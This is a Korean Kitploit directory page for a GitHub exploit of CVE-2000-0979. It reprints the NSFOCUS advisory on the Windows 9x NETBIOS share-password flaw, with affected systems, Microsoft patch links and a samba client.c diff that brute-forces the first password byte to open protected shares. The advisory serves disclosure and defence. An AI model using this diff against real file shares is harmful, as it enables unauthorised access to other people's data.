Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2000-0979 — CVE-2000-0979 | Kitploit
도구/GitHubGitHub/z6543/cve-2000-0979
Exploit FrameworksVulnerability AnalysisExploitationNetwork SecurityPenetration Testing
GitHubz6543/cve-2000-0979

CVE-2000-0979

CVE-2000-0979

저장소 보기
226년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2000-0979

CVE-2000-0979.rb는 Windows 95 SMB 서비스를 대상으로 CVE-2000-0979를 익스플로잇하는 독립형 도구입니다.

msf_2000_0979.rb는 Metasploit 모듈입니다. 이 파일을 ⁨metasploit-framework⁩ ▸ ⁨modules⁩ ▸ ⁨auxiliary⁩ ▸ scanner⁩ ▸ ⁨smb⁩에 복사할 수 있습니다.

MSF module

더 많은 문서가 곧 제공됩니다!

원본 권고

NSFOCUS 보안 권고(SA2000-05)

주제: Microsoft Windows 9x NETBIOS 암호 확인 취약점

릴리스 날짜: 2000년 8월 24일 업데이트 날짜: 2000년 10월 11일

영향을 받는 시스템

  • Microsoft Windows 95
  • Microsoft Windows 98
  • Microsoft Windows 98 Second Edition
  • Microsoft Windows Me

영향을 받지 않는 시스템

  • Microsoft Windows NT 4.0
  • Microsoft Windows 2000

영향

Microsoft Windows 9x NETBIOS 프로토콜 구현에 사용되는 암호 확인 체계에 취약점이 존재합니다. 이 취약점으로 인해 모든 사용자가 암호 보호 기능이 있는 Windows 9x 파일 공유 서비스에 접근할 수 있습니다. 공격자는 공유 암호를 알 필요가 없습니다.

설명

Microsoft Windows 9x 시스템의 공유 리소스를 보호하기 위해 암호를 설정할 수 있습니다. 그러나 Microsoft Windows 9x NETBIOS 프로토콜 구현에 사용되는 암호 확인 체계에 취약점이 존재합니다. 암호를 확인할 때 암호의 길이는 클라이언트에서 서버로 전송되는 데이터의 길이에 따라 결정됩니다. 즉, 클라이언트가 암호 길이를 1바이트로 설정하고 평문 암호가 포함된 패킷을 서버로 보내면, 서버는 이를 공유 암호(평문)의 첫 번째 바이트와만 비교하고, 일치하면 확인 과정이 완료됩니다. 공격자가 해야 할 일은 피해자의 암호 첫 번째 바이트를 추측하고 시도하는 것뿐입니다. Windows 9x 원격 관리 시스템도 동일한 공유 암호 인증 방식을 사용하므로 영향을 받습니다.

익스플로잇

다음은 이 버그를 보여주는 간단한 예입니다. samba 소스 패키지를 가져와서 source/client/client.c를 다음과 같이 수정하십시오:

root@kitploit:~

--- samba-2.0.6.orig/source/client/client.c     Thu Nov 11 10:35:59 1999
+++ samba-2.0.6/source/client/client.c  Mon Sep 18 21:20:29 2000
@@ -1961,12 +1961,22 @@ struct cli_state *do_connect(char *serve

        DEBUG(4,(" session setup ok\n"));

+/*
        if (!cli_send_tconX(c, share, "?????",
                            password, strlen(password)+1)) {
                DEBUG(0,("tree connect failed: %s\n", cli_errstr(c)));
                cli_shutdown(c);
                return NULL;
        }
+*/
+
+        password[0] = 0;
+        c->sec_mode = 0;
+        do{
+
+          password[0]+=1;
+
+        }while(!cli_send_tconX(c, share, "?????", password, 1));

        DEBUG(4,(" tconx ok\n"));

임시 해결 방법

Microsoft 파일 및 인쇄 공유 서비스를 닫습니다.

해결책

Microsoft는 이 결함에 대해 통보를 받았으며 관련 보안 게시판을 발표했습니다.

게시판은 다음에서 확인할 수 있습니다:

http://www.microsoft.com/technet/security/bulletin/MS00-072.asp

패치는 다음에서 얻을 수 있습니다:

. Microsoft Windows 95

패치가 곧 제공될 예정입니다.

. Microsoft Windows 98 및 98 Second Edition

http://download.microsoft.com/download/win98SE/Update/11958/W98/EN-US/273991USA8.EXE

. Microsoft Windows Me

http://download.microsoft.com/download/winme/Update/11958/WinMe/EN-US/273991USAM.EXE

면책 조항

제공된 정보는 NSFOCUS에 의해 "있는 그대로" 제공되며 어떠한 종류의 보증도 없습니다. NSFOCUS는 상품성에 대한 보증을 제외한 모든 명시적 또는 묵시적 보증을 부인합니다. 어떠한 경우에도 NSFOCUS는 직접, 간접, 부수적, 결과적 손해, 영업 이익 손실 또는 특별 손해를 포함한 모든 손해에 대해 책임을 지지 않습니다. 단, NSFOCUS가 그러한 손해의 가능성을 사전에 인지한 경우에도 마찬가지입니다. 이 정보의 배포 또는 복제는 권고가 어떤 방식으로도 수정되지 않은 경우에 한합니다.

?저작권 1999-2000 NSFOCUS. 모든 권리 보유. 이용 약관.

NSFOCUS 보안 팀 [email protected] NSFOCUS INFORMATION TECHNOLOGY CO.,LTD (http://www.nsfocus.com)

도구 다운로드